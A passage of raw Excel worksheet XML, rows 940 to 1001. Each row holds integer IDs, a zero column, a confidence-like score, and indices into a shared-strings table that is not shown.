      <c r="C940">
        <v>3483</v>
      </c>
      <c r="D940">
        <v>0</v>
      </c>
      <c r="E940">
        <v>0.87230002880096436</v>
      </c>
      <c r="F940" t="s">
        <v>7</v>
      </c>
      <c r="G940" t="s">
        <v>1854</v>
      </c>
      <c r="H940" t="s">
        <v>1855</v>
      </c>
    </row>
    <row r="941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A941" s="1">
        <v>939</v>
      </c>
      <c r="B941">
        <v>3493</v>
      </c>
      <c r="C941">
        <v>3493</v>
      </c>
      <c r="D941">
        <v>0</v>
      </c>
      <c r="E941">
        <v>0.95929998159408569</v>
      </c>
      <c r="F941" t="s">
        <v>7</v>
      </c>
      <c r="G941" t="s">
        <v>1856</v>
      </c>
      <c r="H941" t="s">
        <v>1857</v>
      </c>
    </row>
    <row r="942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A942" s="1">
        <v>940</v>
      </c>
      <c r="B942">
        <v>3495</v>
      </c>
      <c r="C942">
        <v>3495</v>
      </c>
      <c r="D942">
        <v>0</v>
      </c>
      <c r="E942">
        <v>0.99889999628067017</v>
      </c>
      <c r="F942" t="s">
        <v>7</v>
      </c>
      <c r="G942" t="s">
        <v>1858</v>
      </c>
      <c r="H942" t="s">
        <v>1859</v>
      </c>
    </row>
    <row r="943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A943" s="1">
        <v>941</v>
      </c>
      <c r="B943">
        <v>3496</v>
      </c>
      <c r="C943">
        <v>3496</v>
      </c>
      <c r="D943">
        <v>0</v>
      </c>
      <c r="E943">
        <v>0.99269998073577881</v>
      </c>
      <c r="F943" t="s">
        <v>7</v>
      </c>
      <c r="G943" t="s">
        <v>1860</v>
      </c>
      <c r="H943" t="s">
        <v>1861</v>
      </c>
    </row>
    <row r="944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A944" s="1">
        <v>942</v>
      </c>
      <c r="B944">
        <v>3497</v>
      </c>
      <c r="C944">
        <v>3497</v>
      </c>
      <c r="D944">
        <v>0</v>
      </c>
      <c r="E944">
        <v>0.99860000610351563</v>
      </c>
      <c r="F944" t="s">
        <v>7</v>
      </c>
      <c r="G944" t="s">
        <v>1862</v>
      </c>
      <c r="H944" t="s">
        <v>1863</v>
      </c>
    </row>
    <row r="945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A945" s="1">
        <v>943</v>
      </c>
      <c r="B945">
        <v>3498</v>
      </c>
      <c r="C945">
        <v>3498</v>
      </c>
      <c r="D945">
        <v>0</v>
      </c>
      <c r="E945">
        <v>0.98930001258850098</v>
      </c>
      <c r="F945" t="s">
        <v>7</v>
      </c>
      <c r="G945" t="s">
        <v>1864</v>
      </c>
      <c r="H945" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A946" s="1">
        <v>944</v>
      </c>
      <c r="B946">
        <v>3499</v>
      </c>
      <c r="C946">
        <v>3499</v>
      </c>
      <c r="D946">
        <v>0</v>
      </c>
      <c r="E946">
        <v>0.99970000982284546</v>
      </c>
      <c r="F946" t="s">
        <v>7</v>
      </c>
      <c r="G946" t="s">
        <v>1866</v>
      </c>
      <c r="H946" t="s">
        <v>1867</v>
      </c>
    </row>
    <row r="947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A947" s="1">
        <v>945</v>
      </c>
      <c r="B947">
        <v>3500</v>
      </c>
      <c r="C947">
        <v>3500</v>
      </c>
      <c r="D947">
        <v>0</v>
      </c>
      <c r="E947">
        <v>0.98470002412796021</v>
      </c>
      <c r="F947" t="s">
        <v>7</v>
      </c>
      <c r="G947" t="s">
        <v>1868</v>
      </c>
      <c r="H947" t="s">
        <v>1869</v>
      </c>
    </row>
    <row r="948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A948" s="1">
        <v>946</v>
      </c>
      <c r="B948">
        <v>3501</v>
      </c>
      <c r="C948">
        <v>3501</v>
      </c>
      <c r="D948">
        <v>0</v>
      </c>
      <c r="E948">
        <v>0.99959999322891235</v>
      </c>
      <c r="F948" t="s">
        <v>7</v>
      </c>
      <c r="G948" t="s">
        <v>1870</v>
      </c>
      <c r="H948" t="s">
        <v>1871</v>
      </c>
    </row>
    <row r="949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A949" s="1">
        <v>947</v>
      </c>
      <c r="B949">
        <v>3494</v>
      </c>
      <c r="C949">
        <v>3494</v>
      </c>
      <c r="D949">
        <v>0</v>
      </c>
      <c r="E949">
        <v>0.99940001964569092</v>
      </c>
      <c r="F949" t="s">
        <v>7</v>
      </c>
      <c r="G949" t="s">
        <v>1872</v>
      </c>
      <c r="H949" t="s">
        <v>1873</v>
      </c>
    </row>
    <row r="950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A950" s="1">
        <v>948</v>
      </c>
      <c r="B950">
        <v>3482</v>
      </c>
      <c r="C950">
        <v>3482</v>
      </c>
      <c r="D950">
        <v>0</v>
      </c>
      <c r="E950">
        <v>0.99870002269744873</v>
      </c>
      <c r="F950" t="s">
        <v>7</v>
      </c>
      <c r="G950" t="s">
        <v>1874</v>
      </c>
      <c r="H950" t="s">
        <v>1875</v>
      </c>
    </row>
    <row r="951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A951" s="1">
        <v>949</v>
      </c>
      <c r="B951">
        <v>3481</v>
      </c>
      <c r="C951">
        <v>3481</v>
      </c>
      <c r="D951">
        <v>0</v>
      </c>
      <c r="E951">
        <v>0.99750000238418579</v>
      </c>
      <c r="F951" t="s">
        <v>7</v>
      </c>
      <c r="G951" t="s">
        <v>1876</v>
      </c>
      <c r="H951" t="s">
        <v>1877</v>
      </c>
    </row>
    <row r="952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A952" s="1">
        <v>950</v>
      </c>
      <c r="B952">
        <v>3480</v>
      </c>
      <c r="C952">
        <v>3480</v>
      </c>
      <c r="D952">
        <v>0</v>
      </c>
      <c r="E952">
        <v>0.99889999628067017</v>
      </c>
      <c r="F952" t="s">
        <v>7</v>
      </c>
      <c r="G952" t="s">
        <v>1878</v>
      </c>
      <c r="H952" t="s">
        <v>1879</v>
      </c>
    </row>
    <row r="953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A953" s="1">
        <v>951</v>
      </c>
      <c r="B953">
        <v>3458</v>
      </c>
      <c r="C953">
        <v>3458</v>
      </c>
      <c r="D953">
        <v>0</v>
      </c>
      <c r="E953">
        <v>0.99330002069473267</v>
      </c>
      <c r="F953" t="s">
        <v>7</v>
      </c>
      <c r="G953" t="s">
        <v>1880</v>
      </c>
      <c r="H953" t="s">
        <v>1881</v>
      </c>
    </row>
    <row r="954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A954" s="1">
        <v>952</v>
      </c>
      <c r="B954">
        <v>3461</v>
      </c>
      <c r="C954">
        <v>3461</v>
      </c>
      <c r="D954">
        <v>0</v>
      </c>
      <c r="E954">
        <v>0.98650002479553223</v>
      </c>
      <c r="F954" t="s">
        <v>7</v>
      </c>
      <c r="G954" t="s">
        <v>1882</v>
      </c>
      <c r="H954" t="s">
        <v>1883</v>
      </c>
    </row>
    <row r="955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A955" s="1">
        <v>953</v>
      </c>
      <c r="B955">
        <v>3462</v>
      </c>
      <c r="C955">
        <v>3462</v>
      </c>
      <c r="D955">
        <v>0</v>
      </c>
      <c r="E955">
        <v>0.60769999027252197</v>
      </c>
      <c r="F955" t="s">
        <v>7</v>
      </c>
      <c r="G955" t="s">
        <v>1884</v>
      </c>
      <c r="H955" t="s">
        <v>1885</v>
      </c>
    </row>
    <row r="956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A956" s="1">
        <v>954</v>
      </c>
      <c r="B956">
        <v>3464</v>
      </c>
      <c r="C956">
        <v>3464</v>
      </c>
      <c r="D956">
        <v>0</v>
      </c>
      <c r="E956">
        <v>0.59769999980926514</v>
      </c>
      <c r="F956" t="s">
        <v>7</v>
      </c>
      <c r="G956" t="s">
        <v>1886</v>
      </c>
      <c r="H956" t="s">
        <v>1887</v>
      </c>
    </row>
    <row r="957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A957" s="1">
        <v>955</v>
      </c>
      <c r="B957">
        <v>6341</v>
      </c>
      <c r="C957">
        <v>6341</v>
      </c>
      <c r="D957">
        <v>0</v>
      </c>
      <c r="E957">
        <v>0.91860002279281616</v>
      </c>
      <c r="F957" t="s">
        <v>7</v>
      </c>
      <c r="G957" t="s">
        <v>1888</v>
      </c>
      <c r="H957" t="s">
        <v>1889</v>
      </c>
    </row>
    <row r="958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A958" s="1">
        <v>956</v>
      </c>
      <c r="B958">
        <v>3467</v>
      </c>
      <c r="C958">
        <v>3467</v>
      </c>
      <c r="D958">
        <v>0</v>
      </c>
      <c r="E958">
        <v>0.95450001955032349</v>
      </c>
      <c r="F958" t="s">
        <v>7</v>
      </c>
      <c r="G958" t="s">
        <v>1890</v>
      </c>
      <c r="H958" t="s">
        <v>1891</v>
      </c>
    </row>
    <row r="959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A959" s="1">
        <v>957</v>
      </c>
      <c r="B959">
        <v>3469</v>
      </c>
      <c r="C959">
        <v>3469</v>
      </c>
      <c r="D959">
        <v>0</v>
      </c>
      <c r="E959">
        <v>0.9868999719619751</v>
      </c>
      <c r="F959" t="s">
        <v>7</v>
      </c>
      <c r="G959" t="s">
        <v>1892</v>
      </c>
      <c r="H959" t="s">
        <v>1893</v>
      </c>
    </row>
    <row r="960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A960" s="1">
        <v>958</v>
      </c>
      <c r="B960">
        <v>3470</v>
      </c>
      <c r="C960">
        <v>3470</v>
      </c>
      <c r="D960">
        <v>0</v>
      </c>
      <c r="E960">
        <v>0.99000000953674316</v>
      </c>
      <c r="F960" t="s">
        <v>7</v>
      </c>
      <c r="G960" t="s">
        <v>1894</v>
      </c>
      <c r="H960" t="s">
        <v>1895</v>
      </c>
    </row>
    <row r="961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A961" s="1">
        <v>959</v>
      </c>
      <c r="B961">
        <v>3471</v>
      </c>
      <c r="C961">
        <v>3471</v>
      </c>
      <c r="D961">
        <v>0</v>
      </c>
      <c r="E961">
        <v>0.85699999332427979</v>
      </c>
      <c r="F961" t="s">
        <v>7</v>
      </c>
      <c r="G961" t="s">
        <v>1896</v>
      </c>
      <c r="H961" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A962" s="1">
        <v>960</v>
      </c>
      <c r="B962">
        <v>3472</v>
      </c>
      <c r="C962">
        <v>3472</v>
      </c>
      <c r="D962">
        <v>0</v>
      </c>
      <c r="E962">
        <v>0.63330000638961792</v>
      </c>
      <c r="F962" t="s">
        <v>7</v>
      </c>
      <c r="G962" t="s">
        <v>1898</v>
      </c>
      <c r="H962" t="s">
        <v>1899</v>
      </c>
    </row>
    <row r="963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A963" s="1">
        <v>961</v>
      </c>
      <c r="B963">
        <v>3473</v>
      </c>
      <c r="C963">
        <v>3473</v>
      </c>
      <c r="D963">
        <v>0</v>
      </c>
      <c r="E963">
        <v>0.99239999055862427</v>
      </c>
      <c r="F963" t="s">
        <v>7</v>
      </c>
      <c r="G963" t="s">
        <v>1900</v>
      </c>
      <c r="H963" t="s">
        <v>1901</v>
      </c>
    </row>
    <row r="964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A964" s="1">
        <v>962</v>
      </c>
      <c r="B964">
        <v>6425</v>
      </c>
      <c r="C964">
        <v>6425</v>
      </c>
      <c r="D964">
        <v>0</v>
      </c>
      <c r="E964">
        <v>0.98640000820159912</v>
      </c>
      <c r="F964" t="s">
        <v>7</v>
      </c>
      <c r="G964" t="s">
        <v>1902</v>
      </c>
      <c r="H964" t="s">
        <v>1903</v>
      </c>
    </row>
    <row r="965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A965" s="1">
        <v>963</v>
      </c>
      <c r="B965">
        <v>3475</v>
      </c>
      <c r="C965">
        <v>3475</v>
      </c>
      <c r="D965">
        <v>0</v>
      </c>
      <c r="E965">
        <v>0.99479997158050537</v>
      </c>
      <c r="F965" t="s">
        <v>7</v>
      </c>
      <c r="G965" t="s">
        <v>1904</v>
      </c>
      <c r="H965" t="s">
        <v>1905</v>
      </c>
    </row>
    <row r="966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A966" s="1">
        <v>964</v>
      </c>
      <c r="B966">
        <v>3476</v>
      </c>
      <c r="C966">
        <v>3476</v>
      </c>
      <c r="D966">
        <v>0</v>
      </c>
      <c r="E966">
        <v>0.99320000410079956</v>
      </c>
      <c r="F966" t="s">
        <v>7</v>
      </c>
      <c r="G966" t="s">
        <v>1906</v>
      </c>
      <c r="H966" t="s">
        <v>1907</v>
      </c>
    </row>
    <row r="967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A967" s="1">
        <v>965</v>
      </c>
      <c r="B967">
        <v>3477</v>
      </c>
      <c r="C967">
        <v>3477</v>
      </c>
      <c r="D967">
        <v>0</v>
      </c>
      <c r="E967">
        <v>0.99889999628067017</v>
      </c>
      <c r="F967" t="s">
        <v>7</v>
      </c>
      <c r="G967" t="s">
        <v>1908</v>
      </c>
      <c r="H967" t="s">
        <v>1879</v>
      </c>
    </row>
    <row r="968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A968" s="1">
        <v>966</v>
      </c>
      <c r="B968">
        <v>3478</v>
      </c>
      <c r="C968">
        <v>3478</v>
      </c>
      <c r="D968">
        <v>0</v>
      </c>
      <c r="E968">
        <v>0.99709999561309814</v>
      </c>
      <c r="F968" t="s">
        <v>7</v>
      </c>
      <c r="G968" t="s">
        <v>1909</v>
      </c>
      <c r="H968" t="s">
        <v>1910</v>
      </c>
    </row>
    <row r="969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A969" s="1">
        <v>967</v>
      </c>
      <c r="B969">
        <v>3479</v>
      </c>
      <c r="C969">
        <v>3479</v>
      </c>
      <c r="D969">
        <v>0</v>
      </c>
      <c r="E969">
        <v>0.99889999628067017</v>
      </c>
      <c r="F969" t="s">
        <v>7</v>
      </c>
      <c r="G969" t="s">
        <v>1911</v>
      </c>
      <c r="H969" t="s">
        <v>1879</v>
      </c>
    </row>
    <row r="970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A970" s="1">
        <v>968</v>
      </c>
      <c r="B970">
        <v>3504</v>
      </c>
      <c r="C970">
        <v>3504</v>
      </c>
      <c r="D970">
        <v>0</v>
      </c>
      <c r="E970">
        <v>0.78250002861022949</v>
      </c>
      <c r="F970" t="s">
        <v>7</v>
      </c>
      <c r="G970" t="s">
        <v>1912</v>
      </c>
      <c r="H970" t="s">
        <v>1913</v>
      </c>
    </row>
    <row r="971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A971" s="1">
        <v>969</v>
      </c>
      <c r="B971">
        <v>4858</v>
      </c>
      <c r="C971">
        <v>4858</v>
      </c>
      <c r="D971">
        <v>0</v>
      </c>
      <c r="E971">
        <v>0.38539999723434448</v>
      </c>
      <c r="F971" t="s">
        <v>7</v>
      </c>
      <c r="G971" t="s">
        <v>1914</v>
      </c>
      <c r="H971" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A972" s="1">
        <v>970</v>
      </c>
      <c r="B972">
        <v>3112</v>
      </c>
      <c r="C972">
        <v>3112</v>
      </c>
      <c r="D972">
        <v>0</v>
      </c>
      <c r="E972">
        <v>0.71740001440048218</v>
      </c>
      <c r="F972" t="s">
        <v>7</v>
      </c>
      <c r="G972" t="s">
        <v>1916</v>
      </c>
      <c r="H972" t="s">
        <v>1917</v>
      </c>
    </row>
    <row r="973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A973" s="1">
        <v>971</v>
      </c>
      <c r="B973">
        <v>3110</v>
      </c>
      <c r="C973">
        <v>3110</v>
      </c>
      <c r="D973">
        <v>0</v>
      </c>
      <c r="E973">
        <v>0.65640002489089966</v>
      </c>
      <c r="F973" t="s">
        <v>7</v>
      </c>
      <c r="G973" t="s">
        <v>1918</v>
      </c>
      <c r="H973" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A974" s="1">
        <v>972</v>
      </c>
      <c r="B974">
        <v>4148</v>
      </c>
      <c r="C974">
        <v>4148</v>
      </c>
      <c r="D974">
        <v>0</v>
      </c>
      <c r="E974">
        <v>0.59670001268386841</v>
      </c>
      <c r="F974" t="s">
        <v>7</v>
      </c>
      <c r="G974" t="s">
        <v>1920</v>
      </c>
      <c r="H974" t="s">
        <v>1921</v>
      </c>
    </row>
    <row r="975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A975" s="1">
        <v>973</v>
      </c>
      <c r="B975">
        <v>4147</v>
      </c>
      <c r="C975">
        <v>4147</v>
      </c>
      <c r="D975">
        <v>0</v>
      </c>
      <c r="E975">
        <v>0.56999999284744263</v>
      </c>
      <c r="F975" t="s">
        <v>7</v>
      </c>
      <c r="G975" t="s">
        <v>1922</v>
      </c>
      <c r="H975" t="s">
        <v>1923</v>
      </c>
    </row>
    <row r="976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A976" s="1">
        <v>974</v>
      </c>
      <c r="B976">
        <v>2675</v>
      </c>
      <c r="C976">
        <v>2675</v>
      </c>
      <c r="D976">
        <v>0</v>
      </c>
      <c r="E976">
        <v>0.98350000381469727</v>
      </c>
      <c r="F976" t="s">
        <v>7</v>
      </c>
      <c r="G976" t="s">
        <v>1924</v>
      </c>
      <c r="H976" t="s">
        <v>1925</v>
      </c>
    </row>
    <row r="977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A977" s="1">
        <v>975</v>
      </c>
      <c r="B977">
        <v>4144</v>
      </c>
      <c r="C977">
        <v>4144</v>
      </c>
      <c r="D977">
        <v>0</v>
      </c>
      <c r="E977">
        <v>0.99400001764297485</v>
      </c>
      <c r="F977" t="s">
        <v>7</v>
      </c>
      <c r="G977" t="s">
        <v>1926</v>
      </c>
      <c r="H977" t="s">
        <v>1927</v>
      </c>
    </row>
    <row r="978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A978" s="1">
        <v>976</v>
      </c>
      <c r="B978">
        <v>4137</v>
      </c>
      <c r="C978">
        <v>4137</v>
      </c>
      <c r="D978">
        <v>0</v>
      </c>
      <c r="E978">
        <v>0.70579999685287476</v>
      </c>
      <c r="F978" t="s">
        <v>7</v>
      </c>
      <c r="G978" t="s">
        <v>1928</v>
      </c>
      <c r="H978" t="s">
        <v>1929</v>
      </c>
    </row>
    <row r="979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A979" s="1">
        <v>977</v>
      </c>
      <c r="B979">
        <v>2687</v>
      </c>
      <c r="C979">
        <v>2687</v>
      </c>
      <c r="D979">
        <v>0</v>
      </c>
      <c r="E979">
        <v>0.54229998588562012</v>
      </c>
      <c r="F979" t="s">
        <v>7</v>
      </c>
      <c r="G979" t="s">
        <v>1930</v>
      </c>
      <c r="H979" t="s">
        <v>1931</v>
      </c>
    </row>
    <row r="980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A980" s="1">
        <v>978</v>
      </c>
      <c r="B980">
        <v>4132</v>
      </c>
      <c r="C980">
        <v>4132</v>
      </c>
      <c r="D980">
        <v>0</v>
      </c>
      <c r="E980">
        <v>0.39149999618530268</v>
      </c>
      <c r="F980" t="s">
        <v>7</v>
      </c>
      <c r="G980" t="s">
        <v>1932</v>
      </c>
      <c r="H980" t="s">
        <v>1933</v>
      </c>
    </row>
    <row r="981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A981" s="1">
        <v>979</v>
      </c>
      <c r="B981">
        <v>4149</v>
      </c>
      <c r="C981">
        <v>4149</v>
      </c>
      <c r="D981">
        <v>0</v>
      </c>
      <c r="E981">
        <v>0.88919997215270996</v>
      </c>
      <c r="F981" t="s">
        <v>7</v>
      </c>
      <c r="G981" t="s">
        <v>1934</v>
      </c>
      <c r="H981" t="s">
        <v>1935</v>
      </c>
    </row>
    <row r="982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A982" s="1">
        <v>980</v>
      </c>
      <c r="B982">
        <v>4129</v>
      </c>
      <c r="C982">
        <v>4129</v>
      </c>
      <c r="D982">
        <v>0</v>
      </c>
      <c r="E982">
        <v>0.99489998817443848</v>
      </c>
      <c r="F982" t="s">
        <v>7</v>
      </c>
      <c r="G982" t="s">
        <v>1936</v>
      </c>
      <c r="H982" t="s">
        <v>1937</v>
      </c>
    </row>
    <row r="983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A983" s="1">
        <v>981</v>
      </c>
      <c r="B983">
        <v>6726</v>
      </c>
      <c r="C983">
        <v>6726</v>
      </c>
      <c r="D983">
        <v>0</v>
      </c>
      <c r="E983">
        <v>0.9715999960899353</v>
      </c>
      <c r="F983" t="s">
        <v>7</v>
      </c>
      <c r="G983" t="s">
        <v>1938</v>
      </c>
      <c r="H983" t="s">
        <v>1939</v>
      </c>
    </row>
    <row r="984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A984" s="1">
        <v>982</v>
      </c>
      <c r="B984">
        <v>4128</v>
      </c>
      <c r="C984">
        <v>4128</v>
      </c>
      <c r="D984">
        <v>0</v>
      </c>
      <c r="E984">
        <v>0.99489998817443848</v>
      </c>
      <c r="F984" t="s">
        <v>7</v>
      </c>
      <c r="G984" t="s">
        <v>1940</v>
      </c>
      <c r="H984" t="s">
        <v>1941</v>
      </c>
    </row>
    <row r="985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A985" s="1">
        <v>983</v>
      </c>
      <c r="B985">
        <v>2696</v>
      </c>
      <c r="C985">
        <v>2696</v>
      </c>
      <c r="D985">
        <v>0</v>
      </c>
      <c r="E985">
        <v>0.30160000920295721</v>
      </c>
      <c r="F985" t="s">
        <v>7</v>
      </c>
      <c r="G985" t="s">
        <v>1942</v>
      </c>
      <c r="H985" t="s">
        <v>1943</v>
      </c>
    </row>
    <row r="986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A986" s="1">
        <v>984</v>
      </c>
      <c r="B986">
        <v>6722</v>
      </c>
      <c r="C986">
        <v>6722</v>
      </c>
      <c r="D986">
        <v>0</v>
      </c>
      <c r="E986">
        <v>0.65600001811981201</v>
      </c>
      <c r="F986" t="s">
        <v>7</v>
      </c>
      <c r="G986" t="s">
        <v>1944</v>
      </c>
      <c r="H986" t="s">
        <v>1945</v>
      </c>
    </row>
    <row r="987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A987" s="1">
        <v>985</v>
      </c>
      <c r="B987">
        <v>6720</v>
      </c>
      <c r="C987">
        <v>6720</v>
      </c>
      <c r="D987">
        <v>0</v>
      </c>
      <c r="E987">
        <v>0.86269998550415039</v>
      </c>
      <c r="F987" t="s">
        <v>7</v>
      </c>
      <c r="G987" t="s">
        <v>1946</v>
      </c>
      <c r="H987" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A988" s="1">
        <v>986</v>
      </c>
      <c r="B988">
        <v>6718</v>
      </c>
      <c r="C988">
        <v>6718</v>
      </c>
      <c r="D988">
        <v>0</v>
      </c>
      <c r="E988">
        <v>0.99839997291564941</v>
      </c>
      <c r="F988" t="s">
        <v>7</v>
      </c>
      <c r="G988" t="s">
        <v>1948</v>
      </c>
      <c r="H988" t="s">
        <v>1949</v>
      </c>
    </row>
    <row r="989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A989" s="1">
        <v>987</v>
      </c>
      <c r="B989">
        <v>4115</v>
      </c>
      <c r="C989">
        <v>4115</v>
      </c>
      <c r="D989">
        <v>0</v>
      </c>
      <c r="E989">
        <v>0.99529999494552612</v>
      </c>
      <c r="F989" t="s">
        <v>7</v>
      </c>
      <c r="G989" t="s">
        <v>1950</v>
      </c>
      <c r="H989" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A990" s="1">
        <v>988</v>
      </c>
      <c r="B990">
        <v>2692</v>
      </c>
      <c r="C990">
        <v>2692</v>
      </c>
      <c r="D990">
        <v>0</v>
      </c>
      <c r="E990">
        <v>0.63040000200271606</v>
      </c>
      <c r="F990" t="s">
        <v>7</v>
      </c>
      <c r="G990" t="s">
        <v>1952</v>
      </c>
      <c r="H990" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A991" s="1">
        <v>989</v>
      </c>
      <c r="B991">
        <v>2714</v>
      </c>
      <c r="C991">
        <v>2714</v>
      </c>
      <c r="D991">
        <v>0</v>
      </c>
      <c r="E991">
        <v>0.99720001220703125</v>
      </c>
      <c r="F991" t="s">
        <v>7</v>
      </c>
      <c r="G991" t="s">
        <v>1954</v>
      </c>
      <c r="H991" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A992" s="1">
        <v>990</v>
      </c>
      <c r="B992">
        <v>2671</v>
      </c>
      <c r="C992">
        <v>2671</v>
      </c>
      <c r="D992">
        <v>0</v>
      </c>
      <c r="E992">
        <v>0.66680002212524414</v>
      </c>
      <c r="F992" t="s">
        <v>7</v>
      </c>
      <c r="G992" t="s">
        <v>1956</v>
      </c>
      <c r="H992" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A993" s="1">
        <v>991</v>
      </c>
      <c r="B993">
        <v>2656</v>
      </c>
      <c r="C993">
        <v>2656</v>
      </c>
      <c r="D993">
        <v>0</v>
      </c>
      <c r="E993">
        <v>0.71799999475479126</v>
      </c>
      <c r="F993" t="s">
        <v>7</v>
      </c>
      <c r="G993" t="s">
        <v>1958</v>
      </c>
      <c r="H993" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A994" s="1">
        <v>992</v>
      </c>
      <c r="B994">
        <v>2617</v>
      </c>
      <c r="C994">
        <v>2617</v>
      </c>
      <c r="D994">
        <v>0</v>
      </c>
      <c r="E994">
        <v>0.99870002269744873</v>
      </c>
      <c r="F994" t="s">
        <v>7</v>
      </c>
      <c r="G994" t="s">
        <v>1960</v>
      </c>
      <c r="H994" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A995" s="1">
        <v>993</v>
      </c>
      <c r="B995">
        <v>6763</v>
      </c>
      <c r="C995">
        <v>6763</v>
      </c>
      <c r="D995">
        <v>0</v>
      </c>
      <c r="E995">
        <v>0.94359999895095825</v>
      </c>
      <c r="F995" t="s">
        <v>7</v>
      </c>
      <c r="G995" t="s">
        <v>1962</v>
      </c>
      <c r="H995" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A996" s="1">
        <v>994</v>
      </c>
      <c r="B996">
        <v>4191</v>
      </c>
      <c r="C996">
        <v>4191</v>
      </c>
      <c r="D996">
        <v>0</v>
      </c>
      <c r="E996">
        <v>0.98350000381469727</v>
      </c>
      <c r="F996" t="s">
        <v>7</v>
      </c>
      <c r="G996" t="s">
        <v>1964</v>
      </c>
      <c r="H996" t="s">
        <v>1965</v>
      </c>
    </row>
    <row r="997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A997" s="1">
        <v>995</v>
      </c>
      <c r="B997">
        <v>6761</v>
      </c>
      <c r="C997">
        <v>6761</v>
      </c>
      <c r="D997">
        <v>0</v>
      </c>
      <c r="E997">
        <v>0.99800002574920654</v>
      </c>
      <c r="F997" t="s">
        <v>7</v>
      </c>
      <c r="G997" t="s">
        <v>1966</v>
      </c>
      <c r="H997" t="s">
        <v>1967</v>
      </c>
    </row>
    <row r="998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A998" s="1">
        <v>996</v>
      </c>
      <c r="B998">
        <v>4188</v>
      </c>
      <c r="C998">
        <v>4188</v>
      </c>
      <c r="D998">
        <v>0</v>
      </c>
      <c r="E998">
        <v>0.49149999022483831</v>
      </c>
      <c r="F998" t="s">
        <v>7</v>
      </c>
      <c r="G998" t="s">
        <v>1968</v>
      </c>
      <c r="H998" t="s">
        <v>1969</v>
      </c>
    </row>
    <row r="999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A999" s="1">
        <v>997</v>
      </c>
      <c r="B999">
        <v>2631</v>
      </c>
      <c r="C999">
        <v>2631</v>
      </c>
      <c r="D999">
        <v>0</v>
      </c>
      <c r="E999">
        <v>0.81730002164840698</v>
      </c>
      <c r="F999" t="s">
        <v>7</v>
      </c>
      <c r="G999" t="s">
        <v>1970</v>
      </c>
      <c r="H999" t="s">
        <v>1971</v>
      </c>
    </row>
    <row r="1000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1000" s="1">
        <v>998</v>
      </c>
      <c r="B1000">
        <v>2632</v>
      </c>
      <c r="C1000">
        <v>2632</v>
      </c>
      <c r="D1000">
        <v>0</v>
      </c>
      <c r="E1000">
        <v>0.83389997482299805</v>
      </c>
      <c r="F1000" t="s">
        <v>7</v>
      </c>
      <c r="G1000" t="s">
        <v>1972</v>
      </c>
      <c r="H1000" t="s">
        <v>1973</v>
      </c>
    </row>
    <row r="1001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1001" s="1">
        <v>999</v>
      </c>
